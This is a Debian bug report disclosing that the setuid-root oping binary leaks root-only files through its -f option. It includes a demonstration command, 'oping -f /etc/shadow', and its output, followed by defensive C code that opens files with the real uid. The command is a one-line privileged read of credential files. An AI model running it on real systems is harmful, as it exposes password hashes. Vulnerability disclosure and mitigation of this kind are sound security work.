Package: oping
Version: 1.3.2-1
Justification: user security hole
Severity: grave
Tags: security

*** Please type your report below this line ***

oping is setuid root and one of the command line arguments allows a
configuration file to be specified. This file is read and *reported* to
the console. (Unless the file contains contents which can be interpreted
as a list of hostnames!)

For example:

s...@gold:~$ oping -f /etc/shadow
Adding host `root:$1eluded/value:14368:0:99999:7:::' failed: getaddrinfo: Name or service not known
Adding host `daemon:*:13876:0:99999:7:::' failed: getaddrinfo: Name or service not known
Adding host `bin:*:13876:0:99999:7:::' failed: getaddrinfo: Name or service not known
Adding host `sys:*:13876:0:99999:7:::' failed: getaddrinfo: Name or service not known
Adding host `sync:*:13876:0:99999:7:::' failed: getaddrinfo: Name or service not known
Adding host `games:*:13876:0:99999:7:::' failed: getaddrinfo: Name or service not known

This is clearly a security hole - however the good news is that the
version(s) of oping included in lenny and etch are unaffected.

-- System Information:
Debian Release: squeeze/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.30-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages oping depends on:
ii  libc6      2.9-26     GNU C Library: Shared libraries
ii  liboping0  1.3.2-1    C/C++ library to generate ICMP ECH

oping recommends no packages.

oping suggests no packages.

-- no debconf information
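The mitigation a setuid program needs for the class of bug reported above is to open any user-named file with the invoking user's real uid in effect, so the kernel's own permission check applies instead of root's. The following is an added illustration, not oping's code or its actual fix; open_as_real_user(), first_line_length_as_real_user() and write_sample_config() are hypothetical names, and the host list written to /tmp is constructed for the demonstration.

```c
#define _XOPEN_SOURCE 700 /* declares seteuid() and mkstemp() */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Open a user-supplied file with the caller's real uid in effect, so a
 * setuid-root binary cannot act as a generic reader of root-only files.
 * The saved set-user-ID keeps root, so the euid is restored afterwards. */
FILE *open_as_real_user(const char *path)
{
    uid_t euid = geteuid(), ruid = getuid();
    FILE *fp;
    if (euid != ruid && seteuid(ruid) != 0)
        return NULL;                 /* could not drop: refuse to open */
    fp = fopen(path, "r");           /* the kernel now checks the real uid */
    if (euid != ruid && seteuid(euid) != 0) {
        if (fp) fclose(fp);          /* could not re-raise: fail closed */
        return NULL;
    }
    return fp;
}

/* Length of the first line of `path`, read via open_as_real_user().
 * Returns -1 when the file cannot be opened as the real user, 0 if empty. */
int first_line_length_as_real_user(const char *path)
{
    char line[256];
    FILE *fp = open_as_real_user(path);
    if (!fp)
        return -1;
    if (!fgets(line, sizeof line, fp)) { fclose(fp); return 0; }
    fclose(fp);
    return (int)strcspn(line, "\n");
}

/* Hypothetical helper: write a constructed two-host list to a temp file and
 * return its path (static buffer) so the demo runs without any real file. */
const char *write_sample_config(void)
{
    static char path[] = "/tmp/oping-example-XXXXXX";
    static const char sample[] = "host.example.invalid\n192.0.2.1\n";
    int fd = mkstemp(path);
    if (fd < 0) return NULL;
    if (write(fd, sample, sizeof sample - 1) != (ssize_t)(sizeof sample - 1)) { close(fd); return NULL; }
    close(fd);
    return path;
}
```

Run as an ordinary user the open succeeds only on files that user may read; the separate question of not echoing file contents in error messages is independent of this privilege handling.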